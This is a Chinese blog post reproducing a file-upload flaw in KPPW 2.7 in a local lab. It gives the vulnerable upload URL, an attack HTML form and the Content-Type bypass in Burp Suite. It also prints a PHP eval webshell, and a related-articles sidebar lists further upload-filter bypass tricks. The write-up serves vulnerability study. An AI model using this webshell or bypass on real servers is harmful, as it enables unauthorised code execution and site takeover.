KPPW2.7 漏洞利用--文件上传

最新推荐文章于 2022-10-12 10:59:37 发布
最新推荐文章于 2022-10-12 10:59:37 发布
阅读量261 收藏
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/Oran9e/p/8259206.html
版权

KPPW2.7 漏洞利用----文件上传

文件上传导致任意代码执行

 

 

搭建环境

1,集成环境简单方便,如wamp,phpstudy....

2,KPPW v2.7源码一份(文末有分享)放到WWW目录下面

3,安装,访问(http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/install/index.php),选择下一步,下一步,填写数据库信息,后台管理员账号密码等等。

 

上述,漏洞复现平台搭建成功。

首页(http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/index.php)。

 

 

漏洞利用

文件上传----任意代码执行漏洞

利用Burpsuite抓包,修改Content-Type  为 jpg ,从而进行文件上传。

Content-Type,内容类型,一般是指网页中存在的Content-Type,用于定义网络文件的类型和网页的编码,决定文件接收方将以什么形式、什么编码读取这个文件,这就是经常看到一些Asp网页点击的结果却是下载到的一个文件或一张图片的原因。

这里写图片描述
详细的content-type的各种类型,同样用burpsuite抓包,找到content-type字段,修改上传文件类型为image/jpeg,则可以绕过检测,上传脚本文件。

 

1、构造上传客户端html文件(orange.html):

<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1/test/KPPW2.7UTF8/KPPW2.7UTF8/index.php?do=ajax&view=upload&file_type=big&filename=filename">
请选择文件: <br>
<input name="filename" type="file"><br>
<input type="submit" value="上传文件">
</form>

 

2、shell前面加上Ra(orange.php)

 

Ra<?php phpinfo(); ?>
Ra<?php @eval($_POST["orange"]); ?>

 

3、上传shell

 

 

 

一句话

 

 

漏洞复现至此结束!

 

 

源码链接(链接: https://pan.baidu.com/s/1qZRMYXu 密码: 3j7v)

本文链接(http://www.cnblogs.com/Oran9e/p/8259206.html),转载请注明。

任重而道远!

转载于:https://www.cnblogs.com/Oran9e/p/8259206.html

weixin_30678821
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传渗透实验
xiongIT的博客
10-31 1461
文件上传渗透实验
KPPW2.5 漏洞利用--SQL注入
weixin_30341735的博客
01-10 374
KPPW2.5 漏洞利用--SQL注入 SQL注入--布尔型盲注 环境搭建 1,集成环境简单方便,如wamp,phpstudy.... 2,KPPW v2.2源码一份(文末有分享)放到WWW目录下面 3,安装,访问(http://127.0.0.1/test/KPPW2.5UTF8/KPPW2.5UTF8/install/index.php),选择下一步,下一步,填写数据库信...
文件上传漏洞
m0_61974571的博客
10-12 1450
文件上传漏洞 二、一些绕过的方式 1、.黑名单过滤不全 准备上传一句话PHP文件,用burp抓包之后,去修改上传文件的后缀名,依次去尝试,对于黑名单策略(限制某一些文件格式),我们可以上传类似可以解析的文件,绕过黑名单,而其他可作为php脚本执行的其他后缀格式有php4,php5,phtml 2、.htaccess文件绕过 (1).概况来说,.htaccess文件时Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现网页301重定向,自定义404错误页
文件上传漏洞-upload-labs完全使用burpsuite进行抓包处理
weixin_46248422的博客
07-01 2330
大多数网站都有文件上传的接口,但如果在后台开发时并没有对上传的文件进行安全考虑或采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件,从而通过该恶意文件的访问来控制整个后台 1.客户端绕过:js检查 首先观察到提示只允许上传图片文件,那么前端的查看代码,当页面发生改变时,会调用这个checkFileExt函数来检查上传的是不是图片,我们只需要在前端将checkFileExt函数删除,就能上传一个一个非图片文件。 通过burpsuit抓包进行绕过: 2...
KPPW2.2 漏洞利用--文件下载
weixin_30349597的博客
01-10 266
KPPW2.2 漏洞利用--文件下载 任意文件下载漏洞 环境搭建 1,集成环境简单方便,如wamp,phpstudy.... 2,KPPW v2.2源码一份(文末有分享)放到WWW目录下面 3,安装,访问(http://127.0.0.1/test/KPPW2.2UTF8/install/index.php)(如果显示500错误 Internal Server Error ,须将...
客客威客系统KPPW 2.7 UTF8
05-01
客客威客系统KPPW 2.7 UTF8 更新日志:2016-02-02修复1.修复关闭店铺后再次点击出现的样式错误2.修复威客个人中心无法关闭店铺的BUG3.修复雇佣任务被威客拒绝后收不到站内信的BUG4.修复案例不显示议价和福袋任务的BUG...
客客出品专业威客企业系统KPPWv2.7UTF-8
07-29
KPPW是客客团队主打的开源威客系统,同类开源建站产品的领跑者!2014年5月新版KPPW2.5发布了,新版借助客... 一、代码优化更规范 新版本对程序核心类文件进行梳理,移除旧版的冗余文件。按照全新编码标准对控制层和视图
众包威客开源建站系统KPPW-php
03-09
1、客客出品专业威客系统(简称KPPW)是武汉客客团队自主研发的开源系统项目,主要应用于威客模式的在线服务交易平台搭建。KPPW客客出品的专业威客系统,是keke produced professional witkey的缩写。 2、产品业务...
客客威客系统KPPW 2.6 GBK 20150327.zip
05-24
修改首页“资讯”图片新闻显示BUG15、漏洞修复 发布商品存在存储型XSS漏洞16、漏洞修复 发布商品存在无限制刷钱漏洞17、漏洞修复 前台注册存在sql注入漏洞18、修改上传文件时重复弹框提示19、修改优化验证码问题...
客客威客系统KPPW 2.2 GBK Beta.zip
05-27
除了可以上传广告之外,也可以调用其他广告代码,或者远程广告链接。 七、支付宝悬赏担保交易网站更具公信力 新版本新增最新推出的支付宝悬赏担保交易接口,开启后雇主和威客任务交易,资金冻结在用户自己的...
KPPW商业威客系统V2.6商业版完美完整版
07-30
KPPW商业威客系统V2.6商业版完美完整版
(24)文件上传【绕WAF】【burpsuite才是王道】数据溢出、符号字符变异……
03-22 4640
文件上传利用之绕过WAF合集
BurpSuite抓包改包上传
热门推荐
myths_0的专栏
02-15 1万+
http://sec.chinabyte.com/464/12671464.shtml Burp suite是由portswigger开发的一套用于Web渗透测试的集成套件,它包含了spider,scanner(付费版 本),intruder,repeater,sequencer,decoder,comparer等模块,每个模块都有其独特的用途,给专业和非专业的Web渗透测试人员
Web渗透测试----3、文件上传漏洞
七天
12-23 3009
文章目录一、文件上传漏洞二、客户端校验上传文件的方式及绕过2.1、客户端JS验证2.2.1、前端js验证代码2.2.2、绕过前端JS验证三、服务端校验文件上传的方式及绕过3.1、通过文件后缀验证及绕过3.2 、通过文件类型验证及绕过3.3 、通过文件内容验证及绕过3.4、WAF进行校验及绕过3.5、竞争上传绕过3.6、.htaccess文件绕过3.7、根据操作系统特性进行绕过3.8、通过post和get方法绕过3.9、通过文件截断绕过攻击3.10、利用文件包含或解析漏洞绕过上传四、文件上传漏洞的防御总结 .
渗透测试 | 文件上传绕过思路
yu_19980401的博客
11-21 298
文件上传绕过思路 前端验证 浏览器审查元素删除检测函数 上传正常格式文件通过burpsuite抓包修改为filename为脚本 后端验证 基于MIME 上传脚本格式文件,burpsuite 抓包修改文件的content-type 上传正常格式文件,burosuite抓包修改文件的filename为脚本格式 基于后缀 黑名单windows系统 尝试可能未限制但可以执行的其他脚本后缀 大小写绕过 双写绕过 末尾添加.绕过 末尾添加空格绕过 末尾添加::$DATA绕过 截断上传 上传.access文件
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版
安全汪
10-28 1万+
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版  很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。   在后台上传图片的地方添加xxx.jpg 图片   打开burpsiute​ 进入proxy后进
pikachu之文件下载和文件上传
weixin_54431413的博客
04-03 5629
目录 一、文件下载 1.复制这个下载文件地址 2.尝试去下载这个down_nba.php 3.目录扫描工具 二、文件上传 1.checkclient (1)利用burp suite (2)关闭js (3)修改页面源代码 一、文件下载 文件下载漏洞危害较小,不会直接影响网站的权限,但它可以给我们渗透测试提供许多帮助,我们可以去利用文件下载漏洞去下载敏感文件获取更多的信息。 1.复制这个下载文件地址 这可以 看出execdownload.php是和down_nba.php
解析漏洞讲解、filepath、content-type绕过检测上传文件
qq_38135094的博客
04-10 9792
文件上传漏洞是指上传了一个可执行的脚本文件,从而获得执行服务器相关的权限和指令。如何上传文件,有很多种方法,而上传需要注意的形式也有很多。 要完成这个攻击,要满足以下几个条件: 首先,上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。 其次,用户能够从Web上访问这个文件。如果文件上传了,但用户无法通过Web访问,或者无法得到Web容器
kppw3.1环境要求
最新发布
08-11
KPPW 3.1是一种用于移动应用开发的开发环境,它有一些特定的环境要求。首先,为了运行KPPW 3.1,您需要一个包含Java SE Development Kit(JDK)的计算机。JDK是Java开发的基本工具,它提供编译器、调试器和其他必要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值